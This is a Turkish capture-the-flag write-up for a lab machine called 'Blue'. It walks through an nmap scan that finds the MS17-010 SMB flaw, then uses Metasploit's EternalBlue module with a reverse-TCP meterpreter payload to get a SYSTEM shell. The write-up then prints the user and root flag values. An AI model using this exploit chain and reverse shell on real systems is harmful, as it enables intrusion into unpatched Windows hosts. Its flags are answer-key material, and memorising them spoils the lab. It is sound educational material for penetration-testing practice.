Blue
Blue, açık ortaya çıktığından bu yana çok sayıda büyük ölçekli fidye yazılımı ve kripto madenciliği saldırısında kullanılan EternalBlue açığının ciddiyetini gösteriyor.
User Flag
nmap taramasıyla başlayalım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(root㉿kali)-[~]
└─# nmap -T4 -A --script=vuln 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 05:51 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.40 (10.10.10.40)
Host is up (0.075s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/29%OT=135%CT=1%CU=34036%PV=Y%DS=2%DC=T%G=Y%TM=660
OS:68F7E%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S
OS:%TS=7)SEQ(SP=106%GCD=2%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST
OS:11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CS
OS:T11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=8
OS:0%W=2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 75.17 ms 10.10.14.1 (10.10.14.1)
2 75.29 ms 10.10.10.40 (10.10.10.40)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.11 seconds
nmap sonucunda smb servisinde ms17-010 zafiyeti olduğunu görüyorum.
Metasploitte bulunan ilgili modulü kullanıyorum.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Enable verbose logging with set VERBOSE true
*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*
*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*
*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*
*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*
*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*
*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*
*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*
*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*
*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*
*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*
*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*
*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*
*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*
*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*
*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*
*B0NG0R3* *Les Cadets Rouges*buf*
*Les Tontons Fl4gueurs* *404 : Flag Not Found*
*' UNION SELECT 'password* _________ __ *OCD247*Sparkle Pony*
*burner_herz0g* \_ ___ \_____ _______/ |_ __ _________ ____ *Kill$hot*ConEmu*
*here_there_be_trolls* / \ \/\__ \ \____ \ __\ | \_ __ \_/ __ \ *;echo"hacked"*
*r4t5_*6rung4nd4*NYUSEC* \ \____/ __ \| |_> > | | | /| | \/\ ___/ *karamel4e*
*IkastenIO*TWC*balkansec* \______ (____ / __/|__| |____/ |__| \___ > *cybersecurity.li*
*TofuEelRoll*Trash Pandas* \/ \/|__| \/ *OneManArmy*cyb3r_w1z4rd5*
*Astra*Got Schwartz?*tmux* ___________.__ *AreYouStuck*Mr.Robot.0*
*\nls*Juicy white peach* \__ ___/| |__ ____ *EPITA Rennes*
*HackerKnights* | | | | \_/ __ \ *guildOfGengar*Titans*
*Pentest Rangers* | | | Y \ ___/ *The Libbyrators*
*placeholder name*bitup* |____| |___| /\___ > *JeffTadashi*Mikeal*
*UCASers*onotch* \/ \/ *ky_dong_day_song*
*NeNiNuMmOk* ___________.__ *JustForFun!*
*Maux de tête*LalaNG* \_ _____/| | _____ ____ *g3tsh3Lls0on*
*crr0tz*z3r0p0rn*clueless* | __) | | \__ \ / ___\ *Phở Đặc Biệt*Paradox*
*HackWara* | \ | |__/ __ \_/ /_/ > *KaRIPux*inf0sec*
*Kugelschreibertester* \___ / |____(____ /\___ / *bluehens*Antoine77*
*icemasters* \/ \//_____/ *genxy*TRADE_NAMES*
*Spartan's Ravens* _______________ _______________ *BadByte*fontwang_tw*
*g0ldd1gg3rs*pappo* \_____ \ _ \ \_____ \ _ \ *ghoti*
*Les CRACKS*c0dingRabbits* / ____/ /_\ \ / ____/ /_\ \ *LinuxRiders*
*2Cr4Sh*RecycleBin* / \ \_/ \/ \ \_/ \ *Jalan Durian*
*ExploitStudio* \_______ \_____ /\_______ \_____ / *WPICSC*logaritm*
*Car RamRod*0x41414141* \/ \/ \/ \/ *Orv1ll3*team-fm4dd*
*Björkson*FlyingCircus* *PwnHub*H4X0R*Yanee*
*Securifera*hot cocoa* *Et3rnal*PelarianCP*
*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*
*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*
*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*
*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*
*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*
*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*
*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*
*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*
*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*
*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*
*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*
*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*
*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*
*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*
*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*
=[ metasploit v6.4.0-dev ]
+ -- --=[ 2404 exploits - 1239 auxiliary - 422 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
[-] Invalid parameter "o�ptions", use "show -h" for more information
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.154.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.4
lhost => 10.10.14.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.40:49158) at 2024-03-29 05:58:10 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
Meterpreter session almayı başardım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ..
cmeterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:27 -0400 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2022-02-18 10:11:31 -0500 Config.Msi
040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
040555/r-xr-xr-x 4096 dir 2022-02-18 10:02:50 -0500 Program Files
040555/r-xr-xr-x 4096 dir 2017-07-14 12:58:41 -0400 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2017-12-23 21:23:01 -0500 ProgramData
040777/rwxrwxrwx 0 dir 2022-02-18 09:09:14 -0500 Recovery
040777/rwxrwxrwx 0 dir 2017-07-14 09:48:44 -0400 Share
040777/rwxrwxrwx 4096 dir 2022-02-18 10:02:22 -0500 System Volume Information
040555/r-xr-xr-x 4096 dir 2017-07-21 02:56:23 -0400 Users
040777/rwxrwxrwx 16384 dir 2024-03-29 05:51:58 -0400 Windows
000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
meterpreter > cd Users
meterpreter > pwd
C:\Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2017-07-21 02:56:36 -0400 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 03:07:31 -0400 Default
040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Default User
040555/r-xr-xr-x 4096 dir 2011-04-12 03:51:29 -0400 Public
100666/rw-rw-rw- 174 fil 2009-07-14 00:54:24 -0400 desktop.ini
040777/rwxrwxrwx 8192 dir 2017-07-14 09:45:53 -0400 haris
meterpreter > cd haris
meterpreter > ls
Listing: C:\Users\haris
=======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 AppData
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Application Data
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Contacts
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Cookies
040555/r-xr-xr-x 0 dir 2017-12-23 21:23:23 -0500 Desktop
040555/r-xr-xr-x 4096 dir 2017-07-15 03:58:33 -0400 Documents
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Downloads
040555/r-xr-xr-x 4096 dir 2017-07-15 03:58:33 -0400 Favorites
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Links
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Music
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2021-01-15 04:41:00 -0500 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 NetHood
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:32 -0400 Pictures
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 PrintHood
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Saved Games
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Searches
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 SendTo
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Templates
040555/r-xr-xr-x 0 dir 2017-07-15 03:58:32 -0400 Videos
100666/rw-rw-rw- 262144 fil 2022-02-18 10:02:40 -0500 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2017-07-14 09:45:36 -0400 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2017-07-14 09:45:37 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\haris\Desktop
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2017-07-15 03:58:32 -0400 desktop.ini
100444/r--r--r-- 34 fil 2024-03-29 05:41:32 -0400 user.txt
meterpreter > cat user.txt
40db1b2cb5d1ad8038ef1c6d82ca8931
User Flag’ı buldum. Sıra root flag’ı bulmaya geldi.
Root Flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2024-03-29 05:41:32 -0400 AppData
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Application Data
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Contacts
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Cookies
040555/r-xr-xr-x 0 dir 2017-12-23 21:22:48 -0500 Desktop
040555/r-xr-xr-x 4096 dir 2017-07-21 02:56:40 -0400 Documents
040555/r-xr-xr-x 4096 dir 2022-02-18 10:21:10 -0500 Downloads
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:42 -0400 Favorites
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Links
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Music
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2024-03-29 05:41:34 -0400 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 NetHood
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Pictures
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 PrintHood
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Saved Games
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Searches
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 SendTo
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Templates
040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Videos
100666/rw-rw-rw- 262144 fil 2024-03-29 05:41:34 -0400 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2017-07-21 02:56:24 -0400 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2017-07-21 02:56:24 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2017-07-21 02:56:40 -0400 desktop.ini
100444/r--r--r-- 34 fil 2024-03-29 05:41:32 -0400 root.txt
meterpreter > cat root.txt
3cbf4c1a4f6c50fc5c91c7d66da2cb1d
This post is licensed under CC BY 4.0 by the author.